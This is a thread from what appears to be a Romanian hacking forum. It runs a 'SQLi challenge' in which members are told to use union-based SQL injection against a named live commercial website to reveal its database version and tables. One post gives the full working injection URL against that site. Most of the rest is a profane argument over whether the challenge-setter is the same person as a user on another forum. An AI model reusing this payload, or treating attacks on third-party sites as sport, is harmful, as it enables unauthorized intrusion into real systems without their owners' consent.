SQLi challenge #1[easy]~Hannibal.

Posted (edited)

-=-=Challenge CLOSED=-=-




  • afisati versiunea bazei de date cu nickname-ul vostru;
  • afisati toate tabelele din baza de date curenta.




  • folositi union based SQLi;
  • postati o poza ca proof;
  • sintaxa se trimite prin PM.


- ajkaro

- Reckon


Edited by Hannibal.
  Reckon said:
Look at his photo: uDtWH.png

Who the fuck is DrHouse? I don't think is Hannibal.

And here is the solution:

http://exocoupe.com/enlevement-matiere/produit/produit.php?id=-24 union select 1,concat(0x3c2f7469746c653e,version(),0x7e,0x5265636b6f6e),3,4

I know him (DrHouse) from some other forum. Here he has other name. I won't speak for him. I let him to answer you...


What benefit would be my solution for that challenge? :) No big deal :)


Based on my conversation with Hannibal (RST) he is DrHouse on Z+ forum. I know that for sure because he made something on Z+ forum what I suggested him in my PM here on RST.

To make it short: my suggestion to Hannibal (PM on RST) was executed by DrHouse on Z+ forum.

  Reckon said:
Ok and the question is:

If he have finished this challenge (And this challenge is a little "hard"), why did he asked me about hints on our exams from Pentesting-Academy ?

It is not on me to judge what did he do and why...

For me Hannibal is DrHouse for sure. What coincidence can be I said something to Hannibal here on RST and DrHouse executed that on other forum?

Lets wait for him to respond on your doubts...


Ehh, era timpul sa dau si eu un reply pentru ca deja imi sar nervii.

@Reckon. 1.DrHouse e nickname-ul meu de pe un alt forum, nu era nevoie sa fac alt print-screen.

2. Poti sa te duci dracu cu honeypot-ul tau si cu vrajelile de genul.

3. GaB2p.png

Iti trimit sintaxa pe PM, nu-ti fa probleme.

4. Alta data stai in pula mea in banca ta si nu mai comenta aiurea, sa te aflii in treaba.

Daca vrei sa participi la challenge bine, daca nu abtine-te de la comentarii deastea.

5. Cand vorbeam cu tine despre examenele de la PA abia invatam despre SQLi, e ceva timp de atunci, cred ca era timpul sa mai progresez nu crezi?

6. MUIE! Daca mai ai vreun comentariu inteligent trimite-mi-l pe PM, deja ai facut destul post-hunt.

@ajkaro. Thank you for explaining him that he's an idiot, and this was just a challenge, something for fun.


@hanni Vezi ca esti pe RST, ai nick-ul hannibal, nu ma/ne intereseaza si nu pot/putem ghici ca daca e cumva numele tau de pe alt forum si nu putem afla asta, invata in pula ta sa raspunzi frumos nu cu aere din astea de smecheras pe internet cu "muie" intr-una, n-o sa rezisti mult, fiindca nici nu meriti, esti din iunie si deja ai inceput sa iei lumea la pula ca tu ai figuri de copil copac.

  hackerika said:
NU CONTEAZA NICK-UL. Ce nu intelegeti?

Daca avea vreo nelamurire exista PM nu?..Putea sa-mi ceara sintaxa prin PM nu?

Nu a facut-o, e problema lui nu a mea.

Nu poti sa raspunzi frumos la o astfel de atitudine, nu crezi?

Iunie?..e vorba de mult mai mult, contul asta e din iunie, stai linistit.

  Reckon said:

Sincer ma depaseste situatia ta, esti incredibil, maestru. TU in 3 zile ai invatat cum sa scoti din TITLE o coloana injectabila, esti foarte tare.

Posibil, n-ai de unde sa stii:>:))..hai sa n-o mai lungim, e deja destul offtopic. Daca mai ai ceva sa-mi spui astept un mesaj privat.

Challenge inchis, pt ca ai postat sintaxa si nu cred ca mai e altceva de zis.

